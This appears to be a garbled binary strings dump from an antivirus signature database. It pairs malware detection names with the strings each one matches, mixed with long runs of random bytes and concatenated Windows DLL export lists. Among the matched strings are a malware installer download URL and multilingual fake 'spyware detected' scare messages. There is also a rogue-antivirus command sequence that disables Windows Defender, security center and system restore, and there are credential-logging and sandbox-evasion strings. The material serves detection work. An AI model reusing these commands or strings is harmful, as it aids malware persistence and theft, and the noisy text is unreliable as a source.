2008 spywareguard.exe \\Microsoft APData\\ Smart Protector Personal Protector Downloader.MDW\\Trojan Virtumonde\\Trojan Rebooter.J\\Trojan SistemKey SistemKeyx Windows Security Center reports that is inactive. Note: Windows has detected an unregistered version of ' 7Note: Windows has detected an unregistered version of 'x /setup.php?track_id=%d svchos2.exe svchos.exe \\Application Data\\Microsoft\\ \\Microsoft Private Data\\Microsoft\\ \"\\Microsoft Private Data\\Microsoft\\ Downloader.MDW\\Trojanx Error 404 Not Found. Fatal error! /setup.php? /install/? track_id=%d CTEMON.EXE SOFTWARE\\Spyware Guard This will install the trial version of Spyware Guard 20 7This will install the trial version of Spyware Guard 20 Spyware Guard 20 installation ~,c`( qWBEu \\wsc32x.exe_ _ %\\wsc32x.exe_ \\winlogon.exe_ #\\winlogon.exe_ \\winscenter.exe_ %\\winscenter.exe_ \\Smart Protector.lnk_ \\System Guard 20??.lnk_ \\Personal Protector.lnk_ \\Spyware Guard 20??.lnk_ \\Microsoft\\internet.dll_ #\\Microsoft\\internet.dll_ \\Personal Guard 20??.lnk_ \\Malware Defender 20??.lnk_) \\Microsoft\\Internet Explorer\\olesys.dll` \\Malware Defender 20??.lnk_)#\\Microsoft\\Internet Explorer\\olesys.dll` \\Smart Protector` &\\Smart Protector` \\Microsoft AData` \\Microsoft PData` \\System Guard 20??` \\Microsoft\\Protect` #\\Microsoft\\Protect` &\\System Guard 20??` \\Personal Protector` \\Spyware Guard 20??` &\\Personal Protector` &\\Spyware Guard 20??` \\spyware guard 20??` &\\spyware guard 20??` \\Personal Guard 20??` &\\Personal Guard 20??` \\Malware Defender 20??` &\\Malware Defender 20??` \\Microsoft Private Data` #\\Microsoft Private Data` \\Microsoft\\Network\\DLLs` \\Microsoft\\Media Index\\Drivers`# \\Microsoft\\Internet Explorer\\DLLsc #\\Microsoft\\Network\\DLLs` #\\Microsoft\\Media Index\\Drivers`##\\Microsoft\\Internet Explorer\\DLLsc Software\\System Guard 20?? Software\\System Guard 20??c! Software\\Spyware Guard 20?? Software\\Spyware Guard 20??c$ Software\\Malware Defender 20?? Software\\Malware Defender 20??] !Matcash.KY !QQHelper.T http://install .ring520.org/kkkk/mminstall.exe?queryid= \\tempaq 700 SetupId Score Score] !Slenfbot.AEV !Slenfbot.AEW !Slenfbot.AEX !Slenfbot.AEY !Slenfbot.AEZ !Bagle.WE !Bagle.WF -6=Rt !Vundo.LB j9S.p !Vundo.JC !Zlob.AOM geography gotoschool .dllgeographygotoschool SearchScopes] !Pushbot.IS !Daonol.A !Daonol.B !Koobface.H %s/friends/?view= recaptcha_image captcha_submit FBSHAREURL FBTARGET FBTARGET] TrojanDownloader:ASX/Wimad.AC ?__asf_script_command_rpf_generated__ http://muzdownload.com freescan.php? id=%var%- PIDwmsid \tbtnGooglet btnYahoo !Vundo.JD !Renos.Q HE\tF@ !Zlob.gen!CP A284-9DF278 DAED9266 IE A] !Vundo.gen!AG onGreek IBM 319 Keyboard Layoutd\" FileVersion5.1.2600.0 (xpclient.010817-1148)@ InternalNamekbdhe319 (3.11) !Bagle.WG TrojanDownloader:ASX/Wimad.AD D__asf_script_command_rpf_generated__ http://mp3codecdownload.com !C2Lop.I BrowserModifier:Win32/SearcherSmart #BrowserModifier:Win32/SearcherSmart searchersmart search enhancer searchersmart sidebar searchersmart logic SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\%s SOFTWARE\\Microsoft\\Internet Explorer\\Explorer Bars\\%s CLSID\\%s\\Implemented Categories\\{00021493-0000-0000-C000-000000000046} /install.php /notify.php /getopt.php /rdr.php myss_install_mutex myss_getopt_mutex _settings Search panel] !Zlob.gen!CQ 0\" !&; =0;*=\"&!. hptr 9CA68B GOMODRI GOMODRI] !Zlob.gen!CT QuickTime 51QuickTime $s/get.php?id= d with adwa __PM_MINI_STO __PM_MINI_STO] !Pushbot.IT !Matcash.gen!G /mcash profile SOFTWARE\\Microsoft\\Internet Explorer\\Main 9tmpStart PageSOFTWARE\\Microsoft\\Internet Explorer\\Main boot.php?mac= InternetShortcut.W InternetShortcut.W] Rogue:Win32/Winwebsec run/v\"windowsdefender\"/fregadd\"hk \\software\\microsoft\\windows\\currentversion\\run\"/v /treg_sz/dc:\\ 0data\\ :trytaskkill/im .exe/fdel\"c:\\windows\\system32\\ .exe\"ifexist\"c:\\windows\\system32\\ .exe\"gototrycmd.exe/cstart @.exe/installdel center\"/vupdatesdisablenotify/treg_dword/d1/fregadd\"hk /treg_sz/d systemrestore\"/vrpsessioninterval/treg_dword/d0/fscstopwscsvcpinglocalhost-w1000-n3>nulscconfigwindefendstart=disabledscconfigmsmpsvcstart=disabledsc.execonfigw =%name%warningtext_ =spyware.iemonsteractivitydetected. isspywarethatattemptstostealpasswordsfrominternetexplorer,mozillafirefox,outlookandotherprograms.\\nclickheretoremoveitimmediatelywith%name% =avisode%name%text_ =actividaddespyware.iemonstersehadetectado.esspywarequetrataderobarpasswordsdeinternetexplorer,mozillafirefox,outlookyotrosprogramas.\\nhagaclickaquiparalimpiarlocon%name%inmediatamente =%name%warnungtext_ =spyware.iemonsterwurdeentdeckt.dasisteinspywareprogramm,dasparoleausinternetexplorer,mozillafirefox,outlookundanderenprogrammenzustehlenversucht.\\nklickensiehier,umessofortmit%name%zuentfernen DE0 fj /m _ $0 /m _k0 0?c:\\documents and settings\\all users\\application data\\ &affid= 0\t&affid= c:\\documents and settings\\johndoe\\application data\\ 0Ac:\\documents and settings\\johndoe\\application data\\ 0>c:\\documents and settings\\all users\\application data\\ Mc:\\documents and settings\\all users\\application data\\ C:\\Documents and Settings\\JohnDoe\\Local Settings\\Application Data\\ 0KC:\\Documents and Settings\\JohnDoe\\Local Settings\\Application Data\\ .exe 0'\\application data\\ 9Xe/ '0 9Xe/A Gc:\\documents and settings\\all users\\application data\\ 0Cc:\\documents and settings\\all users\\application data\\ 9Xe/ '0 \\livesp.exe 0Ec:\\documents and settings\\all users\\application data\\ (.html [c:\\documents and settings\\all users\\application data\\ %s%s\\ 0 ,0\t $ \\PornoTubeXXX\\Antivirus , PornoTubeXXX \\service.exe Antivirus? Antivirus?a~ /api/stats/install/ (Trying uninstall not registered program sendInstallStatistic Start --noscan AFFID= AFFID=a Email address (optional): WinwebSecurity.exe Winweb Security BUG HD5DF7C9D-6069-4552-8B0C-D02A912FC889 4securedigitalpayments*.txt system32\\ws.dlla in=%s&sts=%s php?af fid=%s&s ts=%s url=%s&w :http://supportwebcenter.com/ Guard AutoScan MinRunaq 6SOFTWARE\\Borland\\Delphi\\RTL eurekalog@email.com BugzReportz@gmail.com SettingsAntiRootkit &to obtain an update register Windwos Security System Security BUG Report &Sorry, sending the message didn't work Hreport as confidential and anonymousa~ Z%ProgramFiles%\\Internet Explorer\\IEXPLORE.EXE 2\\System Security 2009.lnk @System Security 2009 Support.lnk @http://%s/in.php |t#mi qY#,y b~R8Y &o42 &o42 k xvhIf >14K=; =7WDJ7 ;LP>| 7^72} ]&{ ; e% $jUS 0pJ\tMX 2}NDk qLk ~nR 8?e0~ HwVeI dNc|- Rl\"@ A MSDBk LRSyY KT<W1 @D\t.~ 0So:7 ;LY JO tTfCJoj< zUa / /p08: zUMN5 YP|ja( M^5 b kOjxL]= 7{\tX@ Kd#>3Q IO,3J hlwcD% lz#Y OX4) D ^ YD^^D; J1MHw $UbI! k!R*= +k6'I h1J4HD [Wj5c,2 9`nUC YiFr7 7\tUG'c kK=l8 `5#b% xn ;0C/_ zEEZ*o K [{[ Py1l\" @1Z*? :,^\\vl %mFzW' aw}4% 8w#<I .=7uZ RvWe-P y;W%$ @@ g.a rpcns4.pdb RPCNS4.DLL I_RpcNsGetBuffer I_RpcNsRaiseException I_RpcNsSendReceive I_RpcReBindBuffer RpcIfIdVectorFree RpcNsBindingExportA RpcNsBindingExportPnPA RpcNsBindingExportPnPW RpcNsBindingExportW RpcNsBindingImportBeginA RpcNsBindingImportBeginW RpcNsBindingImportDone RpcNsBindingImportNext RpcNsBindingLookupBeginA RpcNsBindingLookupBeginW RpcNsBindingLookupDone RpcNsBindingLookupNext RpcNsBindingSelect RpcNsBindingUnexportA RpcNsBindingUnexportPnPA RpcNsBindingUnexportPnPW RpcNsBindingUnexportW RpcNsEntryExpandNameA RpcNsEntryExpandNameW RpcNsEntryObjectInqBeginA RpcNsEntryObjectInqBeginW RpcNsEntryObjectInqDone RpcNsEntryObjectInqNext RpcNsGroupDeleteA RpcNsGroupDeleteW RpcNsGroupMbrAddA RpcNsGroupMbrAddW RpcNsGroupMbrInqBeginA RpcNsGroupMbrInqBeginW RpcNsGroupMbrInqDone RpcNsGroupMbrInqNextA RpcNsGroupMbrInqNextW RpcNsGroupMbrRemoveA RpcNsGroupMbrRemoveW RpcNsMgmtBindingUnexportA RpcNsMgmtBindingUnexportW RpcNsMgmtEntryCreateA RpcNsMgmtEntryCreateW RpcNsMgmtEntryDeleteA RpcNsMgmtEntryDeleteW RpcNsMgmtEntryInqIfIdsA RpcNsMgmtEntryInqIfIdsW RpcNsMgmtHandleSetExpAge RpcNsMgmtInqExpAge RpcNsMgmtSetExpAge RpcNsProfileDeleteA RpcNsProfileDeleteW RpcNsProfileEltAddA RpcNsProfileEltAddW RpcNsProfileEltInqBeginA RpcNsProfileEltInqBeginW RpcNsProfileEltInqDone RpcNsProfileEltInqNextA RpcNsProfileEltInqNextW RpcNsProfileEltRemoveA RpcNsProfileEltRemoveW !\"#$%&'()*+,-./0123456789:;<=RPCNS4.DLLI_RpcNsGetBufferI_RpcNsRaiseExceptionI_RpcNsSendReceiveI_RpcReBindBufferRpcIfIdVectorFreeRpcNsBindingExportARpcNsBindingExportPnPARpcNsBindingExportPnPWRpcNsBindingExportWRpcNsBindingImportBeginARpcNsBindingImportBeginWRpcNsBindingImportDoneRpcNsBindingImportNextRpcNsBindingLookupBeginARpcNsBindingLookupBeginWRpcNsBindingLookupDoneRpcNsBindingLookupNextRpcNsBindingSelectRpcNsBindingUnexportARpcNsBindingUnexportPnPARpcNsBindingUnexportPnPWRpcNsBindingUnexportWRpcNsEntryExpandNameARpcNsEntryExpandNameWRpcNsEntryObjectInqBeginARpcNsEntryObjectInqBeginWRpcNsEntryObjectInqDoneRpcNsEntryObjectInqNextRpcNsGroupDeleteARpcNsGroupDeleteWRpcNsGroupMbrAddARpcNsGroupMbrAddWRpcNsGroupMbrInqBeginARpcNsGroupMbrInqBeginWRpcNsGroupMbrInqDoneRpcNsGroupMbrInqNextARpcNsGroupMbrInqNextWRpcNsGroupMbrRemoveARpcNsGroupMbrRemoveWRpcNsMgmtBindingUnexportARpcNsMgmtBindingUnexportWRpcNsMgmtEntryCreateARpcNsMgmtEntryCreateWRpcNsMgmtEntryDeleteARpcNsMgmtEntryDeleteWRpcNsMgmtEntryInqIfIdsARpcNsMgmtEntryInqIfIdsWRpcNsMgmtHandleSetExpAgeRpcNsMgmtInqExpAgeRpcNsMgmtSetExpAgeRpcNsProfileDeleteARpcNsProfileDeleteWRpcNsProfileEltAddARpcNsProfileEltAddWRpcNsProfileEltInqBeginARpcNsProfileEltInqBeginWRpcNsProfileEltInqDoneRpcNsProfileEltInqNextARpcNsProfileEltInqNextWRpcNsProfileEltRemoveARpcNsProfileEltRemoveW FileDescriptionWindows rpcns4 Library InternalNamerpcns4 OriginalFilenamerpcns4j% $ api-ms-win-core-kernel32-legacy-l1-1-0.dll AddLocalAlternateComputerNameW kernel32.AddLocalAlternateComputerNameW BackupRead kernel32.BackupRead BackupWrite kernel32.BackupWrite BindIoCompletionCallback kernel32.BindIoCompletionCallback CopyFileA kernel32.CopyFileA kernel32.CopyFileW kernel32.CreateFileMappingA CreateMailslotA kernel32.CreateMailslotA CreateNamedPipeA kernel32.CreateNamedPipeA kernel32.CreateSemaphoreW DnsHostnameToComputerNameW kernel32.DnsHostnameToComputerNameW DosDateTimeToFileTime kernel32.DosDateTimeToFileTime FatalAppExitA kernel32.FatalAppExitA FatalAppExitW kernel32.FatalAppExitW FileTimeToDosDateTime kernel32.FileTimeToDosDateTime kernel32.FindResourceA FindResourceExA kernel32.FindResourceExA kernel32.FindResourceW kernel32.GetComputerNameA GetComputerNameW kernel32.GetComputerNameW GetConsoleWindow kernel32.GetConsoleWindow GetShortPathNameA kernel32.GetShortPathNameA kernel32.GetStartupInfoA GetStringTypeExA kernel32.GetStringTypeExA kernel32.GetSystemPowerStatus GetSystemWow64DirectoryA kernel32.GetSystemWow64DirectoryA GetSystemWow64DirectoryW kernel32.GetSystemWow64DirectoryW GetTapeParameters kernel32.GetTapeParameters kernel32.GetTempPathA GetThreadSelectorEntry kernel32.GetThreadSelectorEntry kernel32.GlobalMemoryStatus kernel32.LoadLibraryA kernel32.LoadLibraryW MoveFileA kernel32.MoveFileA MoveFileExA kernel32.MoveFileExA kernel32.MoveFileW kernel32.MulDiv OpenFile kernel32.OpenFile PulseEvent kernel32.PulseEvent RegisterWaitForSingleObject kernel32.RegisterWaitForSingleObject SetConsoleTitleA kernel32.SetConsoleTitleA SetHandleCount kernel32.SetHandleCount SetMailslotInfo kernel32.SetMailslotInfo SetVolumeLabelW kernel32.SetVolumeLabelW UnregisterWait kernel32.UnregisterWait WTSGetActiveConsoleSessionId kernel32.WTSGetActiveConsoleSessionId kernel32.WaitForMultipleObjects !\"#$%&'()*+,-.api-ms-win-core-kernel32-legacy-l1-1-0.dllAddLocalAlternateComputerNameWkernel32.AddLocalAlternateComputerNameWBackupReadkernel32.BackupReadBackupWritekernel32.BackupWriteBindIoCompletionCallbackkernel32.BindIoCompletionCallbackCopyFileAkernel32.CopyFileACopyFileWkernel32.CopyFileWCreateFileMappingAkernel32.CreateFileMappingACreateMailslotAkernel32.CreateMailslotACreateNamedPipeAkernel32.CreateNamedPipeACreateSemaphoreWkernel32.CreateSemaphoreWDnsHostnameToComputerNameWkernel32.DnsHostnameToComputerNameWDosDateTimeToFileTimekernel32.DosDateTimeToFileTimeFatalAppExitAkernel32.FatalAppExitAFatalAppExitWkernel32.FatalAppExitWFileTimeToDosDateTimekernel32.FileTimeToDosDateTimeFindResourceAkernel32.FindResourceAFindResourceExAkernel32.FindResourceExAFindResourceWkernel32.FindResourceWGetComputerNameAkernel32.GetComputerNameAGetComputerNameWkernel32.GetComputerNameWGetConsoleWindowkernel32.GetConsoleWindowGetShortPathNameAkernel32.GetShortPathNameAGetStartupInfoAkernel32.GetStartupInfoAGetStringTypeExAkernel32.GetStringTypeExAGetSystemPowerStatuskernel32.GetSystemPowerStatusGetSystemWow64DirectoryAkernel32.GetSystemWow64DirectoryAGetSystemWow64DirectoryWkernel32.GetSystemWow64DirectoryWGetTapeParameterskernel32.GetTapeParametersGetTempPathAkernel32.GetTempPathAGetThreadSelectorEntrykernel32.GetThreadSelectorEntryGlobalMemoryStatuskernel32.GlobalMemoryStatusLoadLibraryAkernel32.LoadLibraryALoadLibraryWkernel32.LoadLibraryWMoveFileAkernel32.MoveFileAMoveFileExAkernel32.MoveFileExAMoveFileWkernel32.MoveFileWMulDivkernel32.MulDivOpenFilekernel32.OpenFilePulseEventkernel32.PulseEventRegisterWaitForSingleObjectkernel32.RegisterWaitForSingleObjectSetConsoleTitleAkernel32.SetConsoleTitleASetHandleCountkernel32.SetHandleCountSetMailslotInfokernel32.SetMailslotInfoSetVolumeLabelWkernel32.SetVolumeLabelWUnregisterWaitkernel32.UnregisterWaitWTSGetActiveConsoleSessionIdkernel32.WTSGetActiveConsoleSessionIdWaitForMultipleObjectskernel32.WaitForMultipleObjectsRSDS api-ms-win-core-kernel32-legacy-l1-1-0.pdb FileDescriptionWindows api-ms-win-core-kernel32-legacy-l1-1-0 Library FileVersion10.0.10126.0 (GitEnlistment(amopslocal).210831-1009)n' InternalNameapi-ms-win-core-kernel32-legacy-l1-1-0 Microsoft Corporation. All rights reserved.v' OriginalFilenameapi-ms-win-core-kernel32-legacy-l1-1-0j% $ API-MS-WIN-CRT-RUNTIME-L1-1-0.DLL msvcrt.__doserrno __fpecode msvcrt.__fpecode msvcrt.__p___argc __p___argv msvcrt.__p___argv msvcrt.__p___wargv __p__acmdln msvcrt.__p__acmdln __p__pgmptr msvcrt.__p__pgmptr __p__wcmdln msvcrt.__p__wcmdln __p__wpgmptr msvcrt.__p__wpgmptr __pxcptinfoptrs msvcrt.__pxcptinfoptrs __wcserror msvcrt.__wcserror __wcserror_s msvcrt.__wcserror_s _assert msvcrt._assert _beginthread msvcrt._beginthread msvcrt._beginthreadex _c_exit msvcrt._c_exit msvcrt._cexit _clearfp msvcrt._clearfp _configure_narrow_argv msvcrt._configure_narrow_argv _configure_wide_argv msvcrt._configure_wide_argv _control87 msvcrt._control87 msvcrt._controlfp _controlfp_s msvcrt._controlfp_s _crt_atexit msvcrt.atexit _endthread msvcrt._endthread msvcrt._endthreadex _errno msvcrt._errno msvcrt._exit _fpieee_flt msvcrt._fpieee_flt _fpreset msvcrt._fpreset _get_doserrno msvcrt._get_doserrno _get_errno msvcrt._get_errno _get_initial_narrow_environment msvcrt._get_initial_narrow_environment _get_initial_wide_environment msvcrt._get_initial_wide_environment _initialize_narrow_environment msvcrt._initialize_narrow_environment _initialize_wide_environment msvcrt._initialize_wide_environment msvcrt._initterm _initterm_e msvcrt._initterm_e _invalid_parameter_noinfo msvcrt._invalid_parameter_noinfo _invoke_watson msvcrt._invoke_watson _resetstkoflw msvcrt._resetstkoflw _set_app_type msvcrt.__set_app_type _set_controlfp msvcrt._set_controlfp _set_doserrno msvcrt._set_doserrno _set_errno msvcrt._set_errno _set_error_mode msvcrt._set_error_mode _statusfp msvcrt._statusfp _strerror msvcrt._strerror _strerror_s msvcrt._strerror_s _wassert msvcrt._wassert _wcserror msvcrt._wcserror _wcserror_s msvcrt._wcserror_s _wperror msvcrt._wperror _wsystem msvcrt._wsystem msvcrt.abort msvcrt.exit perror msvcrt.perror raise msvcrt.raise signal msvcrt.signal strerror msvcrt.strerror strerror_s msvcrt.strerror_s msvcrt.system RSDSv !\"#$%&'()*+,-./0123456789:;<=API-MS-WIN-CRT-RUNTIME-L1-1-0.DLL__doserrnomsvcrt.__doserrno__fpecodemsvcrt.__fpecode__p___argcmsvcrt.__p___argc__p___argvmsvcrt.__p___argv__p___wargvmsvcrt.__p___wargv__p__acmdlnmsvcrt.__p__acmdln__p__pgmptrmsvcrt.__p__pgmptr__p__wcmdlnmsvcrt.__p__wcmdln__p__wpgmptrmsvcrt.__p__wpgmptr__pxcptinfoptrsmsvcrt.__pxcptinfoptrs__wcserrormsvcrt.__wcserror__wcserror_smsvcrt.__wcserror_s_assertmsvcrt._assert_beginthreadmsvcrt._beginthread_beginthreadexmsvcrt._beginthreadex_c_exitmsvcrt._c_exit_cexitmsvcrt._cexit_clearfpmsvcrt._clearfp_configure_narrow_argvmsvcrt._configure_narrow_argv_configure_wide_argvmsvcrt._configure_wide_argv_control87msvcrt._control87_controlfpmsvcrt._controlfp_controlfp_smsvcrt._controlfp_s_crt_atexitmsvcrt.atexit_endthreadmsvcrt._endthread_endthreadexmsvcrt._endthreadex_errnomsvcrt._errno_exitmsvcrt._exit_fpieee_fltmsvcrt._fpieee_flt_fpresetmsvcrt._fpreset_get_doserrnomsvcrt._get_doserrno_get_errnomsvcrt._get_errno_get_initial_narrow_environmentmsvcrt._get_initial_narrow_environment_get_initial_wide_environmentmsvcrt._get_initial_wide_environment_initialize_narrow_environmentmsvcrt._initialize_narrow_environment_initialize_wide_environmentmsvcrt._initialize_wide_environment_inittermmsvcrt._initterm_initterm_emsvcrt._initterm_e_invalid_parameter_noinfomsvcrt._invalid_parameter_noinfo_invoke_watsonmsvcrt._invoke_watson_resetstkoflwmsvcrt._resetstkoflw_set_app_typemsvcrt.__set_app_type_set_controlfpmsvcrt._set_controlfp_set_doserrnomsvcrt._set_doserrno_set_errnomsvcrt._set_errno_set_error_modemsvcrt._set_error_mode_statusfpmsvcrt._statusfp_strerrormsvcrt._strerror_strerror_smsvcrt._strerror_s_wassertmsvcrt._wassert_wcserrormsvcrt._wcserror_wcserror_smsvcrt._wcserror_s_wperrormsvcrt._wperror_wsystemmsvcrt._wsystemabortmsvcrt.abortexitmsvcrt.exitperrormsvcrt.perrorraisemsvcrt.raisesignalmsvcrt.signalstrerrormsvcrt.strerrorstrerror_smsvcrt.strerror_ssystemmsvcrt.systemRSDSv api-ms-win-crt-runtime-l1-1-0.pdb FileDescriptionWindows api-ms-win-crt-runtime-l1-1-0 Library FileVersion10.0.10126.0 (GitEnlistment(amopslocal).210831-1009)\\ InternalNameapi-ms-win-crt-runtime-l1-1-0 Microsoft Corporation. All rights reserved.d OriginalFilenameapi-ms-win-crt-runtime-l1-1-0j% I2ID; :su7F <VL 4 <f}ak 4#B{# O%5'V W@G<E q'pBbd AF=7** = F0. )K':_ =!uM'* _)+-; {&PFlD> =l~$/ FZdm7 =oR>9 9LEj+ OgCO| <ER%\t =6(}\t u|Vuu c@Sa- E\"3y@ %!(s{m ]^NK] ,<i:= :^r$\t 4>f,h-{ ?k&pj ?p6U,< g3?wF USvB)7 FX66p9 2lY8M _)U4` chaz(( !#OFN:cscript.exe cscript.pdb 2Console Based Script Host ScriptEngine ScriptEnginea{ !#HSTR:bot_exploit_general Trying to exploit IP: %s %s %s: Exploiting IP: %s %s %s: Failed to exploit IP: %s %s %s: Failed to exploit IP: %sa{ shell setup information: :uptime: %-.2d days %-.2d hours %-.2d minutes %-.2d seconds :uptime: %-.2d days %-.2d hours %-.2d minutes %-.2d secondsa{ !#HSTR:Win32/Stresid !#TELPER:HSTR:PDP01.B!dha LoadLibrary samsrv.dll failed DriverProc PDP.dll PDP.dlla{ !#HSTR:Backdoor:Win32/Genevieve.C!dha ParaCmd Error Compress Data Error WinServer2003 CreateWork TCP.exe TCP.exea| !#ALF:Ransom:Win32/KeyPass.MAK!MTB !#ALF:Trojan:MSIL/AgentTesla.BSS!MTB !#HSTR:Trojan:Win32/Stealer.KB!MTB ND:\\workspace\\workspace_c\\GjOGoOIgHJEwh52iJ_20\\Release\\GjOGoOIgHJEwh52iJ_20.pdb ND:\\workspace\\workspace_c\\GjOGoOIgHJEwh52iJ_20\\Release\\GjOGoOIgHJEwh52iJ_20.pdba| !#ALF:Trojan:Win32/PasswordStealer.DFR!MTB !#HackTool:Win32/HaDuFe.A!dha hash.dll hash.dllAddDelGet Hash 0.99 RtlCreateUserThreadHash 0.99 Cannot get LSASS.EXE PID! a| !#ALF:Backdoor:Win32/Turlasvc.P srservice hkmsvc ModStart ModStop ModuleStart ModuleStop ModuleStopa| !#HSTR:Trojan:Win32/Startpage.CU ECHO \"Start Page\"=\"http:// ssaver.exe nightstar.net installing screensaver installing screensavera|(( !#BM_AT:KPortScan3 :/Icon/kps.png ip,port,state 2scanFinished() 1on_scanFinished() ??1QHBoxLayout@@UAE@XZ ??1QHBoxLayout@@UAE@XZa} !#ALF:HackTool:Win32/KMSActivator.PK!MTB KMS Client Emulator KMS Server %KMS Client\\bin\\Release\\KMS Client.pdb %KMS Client\\bin\\Release\\KMS Client.pdba} !#ALF:Trojan:Win32/VBKrypt.AW!MTB #Adobe Photoshop CC 2017 (Macintosh) Midnight logo Photoshop 3.0 Photoshop 3.0a} !#PUA:Block:ProxyCap !%s/api.php?act=%s&logininfo=%s|%s Taro Labs $www.sockscap64.coma} !#HSTR:Trojan:Win32/HarwickLike!dha PID: %d $Failed to create a shell connection. connect IP Port svchost.exea} !#PUA:BundlerCluster:AdaEbook ttoolwindow< a~bra~!$g~ dlctl_no_java dlctl_no_clientpull dlctl_forceoffline dlctl_forceofflinea} !#AllowList:HilanPro <Projects\\CreateMessage\\TestMessage\\obj\\Debug\\ivtExchange.pdb ivtExchange.exea}22 !#OFN:gmer.sys GMER Driver gmer64.pdb gmer64.sys KeUnstackDetachProcess IofCallDriver IofCallDrivera~ !#HSTR:VirTool:Win32/VBInject_emotet.4 LBVDFD675765DFBDFB575BFDFB6576FBDFB7575a~ !#HSTR:Trojan:Win32/Seetdoty.A Commandie timStatus txtView CommandietimStatustxtView webPop1 webPop2 webPop3 webPop1webPop2webPop3 adsl1 adsl2 NetPK adsl1adsl2NetPKa~ !#HSTR:TrojanDropper:Win32/Evotob_Decryption !#BadName.Used.In.DotNET wnet.exe wnet.exe<Module> tim.exe tim.exe<Module> wservice.exe wservice.exe<Module> usbservice.exe usbservice.exe<Module>a~ !#TEL:Trojan:Win32/Lokibot.CZ!MTB !#AllowList:Avanite C:\\Development\\AvaWCM *Copyright Avanite Ltd administration@avanite.com administration@avanite.coma~ !#HSTR:Backdoor:Win32/Genevieve.B!dha ShellCode.dll -send online information with new encrypt key: WinServer2003a~ !#HSTR:PUA:Win32/FusionCore.A3 [Rename] %ls=%ls %s%S.dll PotPlayer unknowndll.pdba~ !#HSTR:Worm:Win32/Puce.gen!A \\Kazza \t\\Morpheus \t\\Grokster \\Bearshare \t\\Gnucleus \\Edonkey2000\\Incoming \\Edonkey2000\\Incominga !#TELPER:HackTool:Win32/Logchil.C!dha '\\SuperLight2.0\\release\\MfcDllServer.pdb $\\SuperLight\\release\\MfcDllServer.pdb $\\SuperLight\\release\\MfcDllServer.pdba !#PUA:BundlerCluster:Bassmod bassmod_free bassmod_init bassmod_musicplay bassmod_musicfree bassmod_musicload bassmod_musicloada (.whenu.com/products_ #WhenU SaveNow advertising software. display pop up display pop upa !#HSTR:TrojanDropper:Win32/Delf.BM preved.bat /Portions Copyright (c) 1999,2003 Avenger by NhT /Portions Copyright (c) 1999,2003 Avenger by NhTa !#Lowfi:PUA:BundlerCluster:GetNow lproductversion getredirect app_manifesta !#PUA:BundlerCluster:InstallCore2 +/tasks=\"comma separated list of task names\" /password=password /type=type name /type=type namea !#TEL:Win32/Backdoor:PreciousLies.A!dha *Network Setup Service gracious_truth.jpg eibmur.dll eibmur.dlla !#ALF:Program:Win32/DLAssist.R :DUMo - Drivers Update Monitor KC Softwaresa !#HSTR:VirTool:Win32/Obfuscator.E hel32hkern hllochualAhVirt hrotehualPhVirt hueryhualQhVirt hdPtrhdReahIsBa hdPtrhdReahIsBaa !#ALF:HSTR:TrojanDownloader:Win32/Rofin.A!bit http://download.cpudln.com HideSys.sys HideSys64.sys TenSafe.exe TenSafe.exea !#HSTR:Torrent:Win32/BitLord BitLord bitlord.com torrent_paused BitLordCrashReporter.exe 1shutdown_bitlord() 1shutdown_bitlord()a !#HSTR:VirTool:Win32/VBInject.gen!AN.2 SetThreadContexta !#ALF:Trojan:Win32/CobaltStrikeMem.M!ibt hwiniThLw hnethwiniThLw User-Agent: Mozilla/5.0 ( !#ALF:Trojan:Win32/VBKrypt.AS!eml ,foredateterrestris.exe tssafeedit.dat aaa_TouchMeNot_.txta !#HSTR:PWS:Win32/OnLineGames.AA &{9184057B-D51B-4C2A-B779-EB4F548E9FDA} %s\\%s\\ShellExecuteHooks &mac=%s /mb.asp /mb.aspa !#TEL:Trojan:Win32/Trochil.D!dha appeur.gnway.cc dns.websecexp.com Outlook2002_POP3 IeChecker.exe IeChecker.exea !#HSTR:Win32/Small.gen!E Windows\\CurrentVersion\\Run netsh firewall If Exist UrlDownload UrlDownloada !#HSTR:VBInject_trampoline &H59595958 &H5059a !#HSTR:Backdoor:Win32/ShinoBot.A Shinobot get_Computer get_Application get_User \tget_Forms !#AllowList:MSCorp.A !#HSTR:Win32/Conhook.dr !#TEL:TrojanDropper:Win32/Plugx!dha Nvcpl %s\\Rundll32.exe \"%s\", DisPlay 84 Plcy.dat ms_win32_eventa !#BM_AT:AnyDesk AnyDesk.pdb .philandro Software GmbH e9cae05e6fab113c28b4dc65c6d03226 e9cae05e6fab113c28b4dc65c6d03226a !#HSTR:Trojan:Win32/C2Lop.gen!E3 $Microsoft Visual C++ Runtime Library e:\\caoe.PDB e:\\caoe.PDBa !#HSTR:VirTool:Win32/ROPINJECTOR.B!MTB !Disassembly after ROP compilation ,Searching for gadget endings in code segment ,Searching for gadget endings in code segmenta PC Defender NoEntireNetwork prockill64.exea x64.zip x32.zip ,admin= ,guid= \\Bypass \\guid.log ct.zip ct.exe ct.exea !#TEL:Trojan:Win32/RykShell D$$[[aYZQ !#HSTR:VirTool:MSIL/NetInjectAProject.A IsSandboxie IsNormanSandbox IsSunbeltSandbox IsAnubisSandbox IsCWSandbox IsCWSandboxa !#TEL::MacOS/MetasploitReverseShell.D !#ALF:HackTool:Win32/Patcher.P!MTB GPM-XM-754678 CONGRATULATION File Succesfully patched CRACK y95ab@hotmail.com y95ab@hotmail.coma !#HSTR:RookIE RookIE/1.0 :*:Enabled:fg_ol_silent AVUdpPacket@@ \tadns_lib_ admshare.dat \tpstat.dat secustat.dat secustat.data !#SLF:Trojan:MSIL/Rolaz.B LMicrosoft.Windows.Sense.AttackScenario Troj.exea !#BM_AT:Winexe \\\\.\\pipe\\ahexec \twinexesvc \\\\.\\pipe\\ntvr Argument domain error (DOMAIN) Incorrect runas credentials Incorrect runas credentialsa !#ALF:Trojan:Win32/Injector.MFP!MTB !#HSTR:Tencent_UsbEjectHelper \\USB_EJECT_45EF662D-FDD7-41F7-B850-534C270CE41Aa !#TELPER:Trojan:Win32/PlaLsalog!dha 6PasswordChangeNotify called: username[%s] password[%s] PasswordFilter:Operation True PasswordFilter:Operation Truea !#AllowList:AerialTool !Microsoft.UltraCam.AtTool.Managed \"UltraMap Aerial Triangulation Tool .NETFramework,Version=v4.5 .NETFramework,Version=v4.5a !#HSTR:Trojan:Win32/Matcash.gen.1 5Local Settings\\Temporary Internet Files\\bestwiner.stt SystemBiosDatea !#SLF:Trojan:Win64/Dogyb.D!dha Set table data ok. It works, Success! Open process falied bitmap is set null bitmap is set nulla !#TEL:Trojan:Win32/Noosuss.A!dha [-]L0ad dr1ver [-]ren4me succ3ssfully!! [-]over writed [-]Read 